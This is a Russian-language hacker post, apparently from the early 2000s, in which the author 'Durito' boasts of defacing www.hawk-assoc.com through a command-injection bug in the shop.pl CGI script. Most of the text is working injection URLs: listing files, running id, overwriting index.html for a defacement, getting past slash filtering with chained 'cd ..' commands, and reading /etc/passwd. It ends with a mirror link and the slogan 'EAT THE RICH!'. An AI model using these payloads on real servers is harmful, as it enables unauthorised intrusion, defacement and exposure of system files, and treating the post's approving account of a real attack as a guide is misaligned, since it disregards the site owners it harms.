Уязвимость www.hawk-assoc.com на скрипте shop.pl
Как-то,
наткнулся я на сайте www.hawk-assoc.com на скрипт shop.pl.
скрипт обрабатывал следующий запрос:
http://www.xxx.com/cgi-local/shop.pl/page=index.html
сразу всполмился довольно старый баг в этом скрипте (возможность
выполнения команд):
http://www.xxx.com/cgi-local/shop.pl/page=;ls|
http://www.xxx.com/cgi-local/shop.pl/page=;id|
http://www.xxx.com/cgi-local/shop.pl/page=;cat shop.pl|
собственно выполнить дефейс не предстовляло особой сложности.
для начала создавался файл index.html:
http://www.xxx.com/cgi-local/shop.pl/page=;echo deface:durito>index.html|
далее созданный файл копировался в директорию выше:
http://www.xxx.com/cgi-local/shop.pl/page=;cp index.html
..|
вот и весь дефейс. но ведь интересно было и по другим директориям
походить. но скрипт упорно резал /, так что команда:
http://www.xxx.com/cgi-local/shop.pl/page=;ls ../cgi-bin|
- не
работала, скрипт выдавал сообщение об ошибке. но тут я вспомнил
о символе ;! С помощью него можно выполнять команды последовательно.
Выполнение каждой последующей команды начинается только
после полного завершения
предыдущей.
Ввожу следующую команду:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;ls| и вижу
листинг каталога вернего уровня. и так далее:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;cd ..;cd
..;ls| добрался и до корня. путешествие по папкам тоже не
представляло сложности:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;cd ..;cd
..;cd etc;ls|
вот и злополучный passwd нашелся:
http://www.xxx.com/cgi-local/shop.pl/page=;cd ..;cd ..;cd
..;cd etc;cat passwd|
и так далее. вот собственно и все.
а вот и зеркало взлома:
http://taxidermia.void.ru/mirrors/2003/09/22/www.hawk-assoc.com
Твой
bug Durito.
_________________
EAT THE RICH!
|
Дата створення/оновлення: 25.05.2018